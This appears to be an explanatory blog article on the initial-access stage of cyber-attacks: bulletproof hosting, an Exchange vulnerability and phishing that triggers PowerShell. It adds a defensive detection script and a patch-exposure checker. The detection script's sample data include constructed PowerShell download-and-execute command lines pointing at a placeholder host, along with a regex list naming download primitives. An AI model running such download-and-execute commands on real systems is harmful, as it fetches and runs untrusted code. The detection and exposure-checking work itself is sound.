What ingredients make a successful cyber-attack? Part 2: Initial Access
Part 1 was finding vulnerabilities (reconnaissance), part 2 is getting your foot in the door
In the previous article on reconnaissance, I talked about how hackers survey their targets to figure out vulnerabilities.
Here, I will discuss how, once they know of potential vulnerabilities, they gain access to the target’s network. This part is, in itself, composed of several detailed tasks.
First, what infrastructure does an attacker need in order to mount an attack campaign against a target? It is not enough to know of a potential vulnerability, for example that the target is running an older version of Microsoft Exchange Server which has not been updated.
You can of course use your own personal computer to attempt to connect with the target, but you will be discovered when IT personnel take a look at the system logs. So how do hackers manage to obfuscate who they are, while at the same time making it look as if any incoming requests to connect are legitimate?
There are many ways of redirecting network traffic to hide the hacker’s identity. One way is through Bulletproof Hosting Services (BPHS). BPHS providers allow cybercriminals to host content that might be illegal in certain countries, and that is extremely hard (if not impossible) to trace back to the cybercriminals themselves. BPHS providers charge anywhere from $2-$300 per month. In many cases, the hacker intentionally chooses the location of their servers to be different from the geolocation of their targets — making it harder to enforce legal punishments.
When thinking about hacking, focus is usually drawn to hackers, their employees, and the exploits they use. However, BPHS providers are the bread and butter for many exploits. According to global cloud security provider Trend Micro,
“Without BPHS, many, if not all major cybercriminal groups would cease to operate.”
“The very nature of BPHSs is that they protect malicious activity against law enforcement, giving cybercriminals the much-needed loophole to wriggle out of and escape from the clutches of both law enforcement and the security industry. That loophole unfortunately largely remains open today.” — Robert McArdle, Trend Micro FTR Senior Manager in 2015
Engineering the Exploit
Once you have acquired your infrastructure, you need to make some choices — what specific vulnerabilities will you exploit? Many times this is through websites, which typically use certain dedicated ports (e.g. port 443 for HTTPS traffic). Other attacks target the ports used by commonly deployed services such as SQL, SSH, and SMB. As I have shown in my previous article, if you know the IP address of your target, it is possible to obtain information about which open ports communicate with the larger Internet, as well as what services they run.
As an example, in the case of the recent Microsoft Exchange hacks, attackers first sent malicious requests to Exchange servers on port 443. They then exploited the CVE-2021-26855 vulnerability, which allowed hackers to send arbitrary HTTPS requests and authenticate as the Exchange server without credentials! You can find the Python code here!
Executing the Exploit
While one way of running an exploit is to type commands against each and every target and attempt to make a connection, this is not efficient — especially when you are dealing with hundreds or thousands of targets. Sometimes, for gaining initial access, you need to think about how the exploit should be executed without raising flags, as well as in a scalable and efficient manner.
One way is for hackers to make use of command and script interpreters like PowerShell on Windows. Adversaries can use interpreters for executing arbitrary commands such as downloading and running executables from the Internet.
In May 2017, FireEye discovered phishing emails that activate Windows PowerShell. This was done by exploiting a vulnerability wherein, once the recipient opens an RTF Word document, the document links to and downloads Excel files. The Excel files in turn contained commands to activate PowerShell. FireEye hadn’t yet observed any post-exploitation activity such as the stealing of data, and so could not assess the goal of the campaign.
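The download-and-execute pattern described in the last two paragraphs is something a defender can look for in process-creation telemetry. What follows is an added example, not code from this article, from FireEye or from any named product: a small Python triage script that scores recorded PowerShell command lines against indicators of that pattern (downloaded content run in memory, encoded commands, hidden windows, execution-policy bypass). The sample command lines are constructed for the example, the indicator list and weights are my own choices, and the alert threshold is an assumption to be tuned against your own baseline.

```python
import re
from typing import Dict, List

# Constructed sample command lines (not real telemetry), as a host sensor
# might record them for each powershell.exe process launch.
SAMPLE_COMMAND_LINES = [
    # benign: scheduled administrative script
    'powershell.exe -NoProfile -File C:\\Scripts\\rotate-logs.ps1',
    # download cradle: fetch a script from the Internet and run it in memory
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"',
    # encoded command with execution-policy bypass (payload is a constructed placeholder)
    'powershell.exe -ExecutionPolicy Bypass -EncodedCommand QUJDREVGRw==',
    # benign: interactive session
    'powershell.exe',
    # download an executable and start it
    'powershell.exe -c "Invoke-WebRequest http://example.invalid/x.exe -OutFile $env:TEMP\\x.exe; Start-Process $env:TEMP\\x.exe"',
]

# Indicators of the behaviour the article describes: an interpreter used to
# pull code from the Internet and run it, plus launch options that hide that
# activity from the user. Weights are an assumption for this example.
INDICATORS = [
    ("encoded_command", 3, re.compile(r"-e(c|nc|ncodedcommand)?\b", re.I)),
    ("hidden_window", 2, re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("invoke_expression", 3, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("download_primitive", 3, re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)),
    ("url_in_command", 1, re.compile(r"https?://", re.I)),
    ("policy_bypass", 2, re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.I)),
    ("start_process", 2, re.compile(r"Start-Process", re.I)),
    ("no_profile", 1, re.compile(r"-nop(rofile)?\b", re.I)),
]

# Assumed threshold: a single low-weight indicator (e.g. -NoProfile, which
# legitimate scheduled scripts use) should not alert on its own.
ALERT_THRESHOLD = 3


def score_command_line(cmd: str) -> Dict[str, object]:
    """Return which indicators fired on one command line and the summed weight."""
    hits = [name for name, _, rx in INDICATORS if rx.search(cmd)]
    score = sum(weight for name, weight, _ in INDICATORS if name in hits)
    return {"command": cmd, "hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Keep only the command lines whose score reaches the alert threshold."""
    return [r for r in (score_command_line(line) for line in lines) if r["alert"]]


if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        print(f"[score {result['score']:>2}] {', '.join(result['hits'])}")
        print(f"    {result['command']}")
```

Run as a script, it reports the three constructed lines that combine a download primitive, in-memory execution, an encoded command or a hidden window, and stays quiet on the two benign launches. Weighting rather than matching on any single token matters here: `-NoProfile` on its own is routine in scheduled administrative scripts, so it contributes but cannot alert alone.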
The stereotypical hacker is one single person, brilliantly coding away and penetrating the most secure defenses.
However, that is not always the case. If anything, I hope this article conveys that the hacking process requires an organizational mindset, and successful attacks require many different components to come together. Most of these components are not what you might think of as hacking, but are essential for successful cyberattack campaigns.
In getting the first foot through the door of their targets, hackers have to successfully coordinate multiple steps. First they need to identify potential vulnerabilities through reconnaissance. Next, they need to obtain Internet infrastructure — websites, domains, insecure devices — so that they can connect to and monitor targets without revealing who they are. For this, they sometimes use bulletproof hosting services that do not reveal their clients’ identities, for a certain service fee.
Next, they need to figure out which vulnerabilities to exploit. MITRE has a Common Vulnerabilities and Exposures (CVE) database which is a great reference for network security personnel to understand the exposure of their organizations and ultimately reduce the exposure. However, hackers can use the same database and target those organizations that have vulnerabilities that could be due to missed updates.
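One way to turn that database into a check on your own exposure is to compare the software versions you actually run against the fixed versions named in advisories. The following is an added example in Python, not code from the article or from MITRE: the advisory records and the host inventory are constructed, the advisory identifiers are placeholders rather than real CVE numbers, and the optional "branch" field is my assumption that a given fix applies only to hosts on the same major.minor line (as with products that ship parallel cumulative-update branches).

```python
from itertools import zip_longest
from typing import Dict, List, Tuple


def parse_version(v: str) -> Tuple[int, ...]:
    """'15.1.2176.9' -> (15, 1, 2176, 9). Raises ValueError on non-numeric parts."""
    return tuple(int(part) for part in v.strip().split("."))


def version_lt(a: str, b: str) -> bool:
    """True if a < b, treating missing trailing components as 0 (so 15.1 == 15.1.0)."""
    for x, y in zip_longest(parse_version(a), parse_version(b), fillvalue=0):
        if x != y:
            return x < y
    return False


def affected(host_version: str, advisory: Dict[str, str]) -> bool:
    """A host is affected if it is on the advisory's branch (when one is given)
    and runs a build below the first fixed version."""
    if "branch" in advisory:
        branch = parse_version(advisory["branch"])
        if parse_version(host_version)[: len(branch)] != branch:
            return False
    return version_lt(host_version, advisory["fixed_in"])


# Constructed advisory feed (placeholder identifiers and version numbers,
# not taken from any real advisory).
ADVISORIES = [
    {"id": "CVE-PLACEHOLDER-0001", "product": "mailserver", "branch": "15.1", "fixed_in": "15.1.2176.9"},
    {"id": "CVE-PLACEHOLDER-0002", "product": "mailserver", "branch": "15.2", "fixed_in": "15.2.792.10"},
    {"id": "CVE-PLACEHOLDER-0003", "product": "sshd", "fixed_in": "8.5"},
]

# Constructed host inventory, as an asset database might export it.
INVENTORY = [
    {"host": "mail-01.example.invalid", "product": "mailserver", "version": "15.1.2106.2"},
    {"host": "mail-02.example.invalid", "product": "mailserver", "version": "15.2.792.10"},
    {"host": "mail-03.example.invalid", "product": "mailserver", "version": "15.2.721.2"},
    {"host": "bastion.example.invalid", "product": "sshd", "version": "8.4"},
    {"host": "build.example.invalid", "product": "sshd", "version": "8.5"},
]


def exposure_report(inventory: List[Dict[str, str]],
                    advisories: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """List every (host, advisory) pair where the host still runs a vulnerable build."""
    findings = []
    for host in inventory:
        for adv in advisories:
            if adv["product"] == host["product"] and affected(host["version"], adv):
                findings.append({
                    "host": host["host"],
                    "advisory": adv["id"],
                    "running": host["version"],
                    "fixed_in": adv["fixed_in"],
                })
    return findings


if __name__ == "__main__":
    for f in exposure_report(INVENTORY, ADVISORIES):
        print(f"{f['host']}: {f['advisory']} (running {f['running']}, fixed in {f['fixed_in']})")
```

With the constructed data, the report names the 15.1 mail server below its branch fix, the 15.2 server that has not reached its fix, and the bastion host one release behind, while the hosts already at the fixed version and the host on the other branch are left alone. Comparing versions as integer tuples rather than as strings is what makes `15.1.2106.2` sort before `15.1.2176.9`; a plain string comparison would also get `8.10` versus `8.9` wrong.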
The final part of gaining initial access is exploitation. Armed with the knowledge and capability to gain unauthorized access, hackers can choose to execute in a number of different ways. One example is sending mass emails with malicious links. Once clicked, these activate common scripting software, e.g. Windows PowerShell, which the hackers can then use to communicate with the target.
This is still very much the beginning of the exploit. In the next few articles in this series, I’m going to discuss — what do hackers do now that they have initial access? How do they achieve their goals?
Senior Data Scientist in NLP. Creator of https://www.answerchatai.com/